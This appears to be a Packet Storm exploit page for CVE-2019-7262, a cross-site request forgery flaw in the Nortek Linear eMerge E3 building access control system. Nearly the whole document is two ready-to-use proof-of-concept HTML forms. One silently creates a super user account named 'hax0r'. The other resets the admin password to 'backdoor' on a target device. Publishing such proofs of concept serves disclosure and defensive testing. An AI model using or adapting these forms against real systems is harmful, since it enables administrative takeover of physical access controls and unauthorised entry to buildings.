Nortek Linear eMerge E3 suffers from a cross site request forgery vulnerability.
1187eae5801444604c8359a9fde61593042e3ab087155ae238842159ca395619
Nortek Linear eMerge E3 Access Control Cross-Site Request Forgery
CVE: CVE-2019-7262
Advisory: https://applied-risk.com/resources/ar-2019-005
Discovered by Gjoko 'LiquidWorm' Krstic
<!-- CSRF Add Super User -->
<html>
<body>
<form action="http://192.168.1.2/?c=webuser&m=insert" method="POST">
<input type="hidden" name="No" value="" />
<input type="hidden" name="ID" value="hax0r" />
<input type="hidden" name="Password" value="hax1n" />
<input type="hidden" name="Name" value="CSRF" />
<input type="hidden" name="UserRole" value="1" />
<input type="hidden" name="Language" value="en" />
<input type="hidden" name="DefaultPage" value="sitemap" />
<input type="hidden" name="DefaultFloorNo" value="1" />
<input type="hidden" name="DefaultFloorState" value="1" />
<input type="hidden" name="AutoDisconnectTime" value="24" />
<input type="submit" value="Add Super User" />
</form>
</body>
</html>
<!-- CSRF Change Admin Password -->
<html>
<body>
<form action="http://192.168.1.2/?c=webuser&m=update" method="POST">
<input type="hidden" name="No" value="1" />
<input type="hidden" name="ID" value="admin" />
<input type="hidden" name="Password" value="backdoor" />
<input type="hidden" name="Name" value="admin" />
<input type="hidden" name="UserRole" value="1" />
<input type="hidden" name="Language" value="en" />
<input type="hidden" name="DefaultPage" value="sitemap" />
<input type="hidden" name="DefaultFloorNo" value="1" />
<input type="hidden" name="DefaultFloorState" value="1" />
<input type="hidden" name="AutoDisconnectTime" value="24" />
<input type="submit" value="Change Admin Password" />
</form>
</body>
</html>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed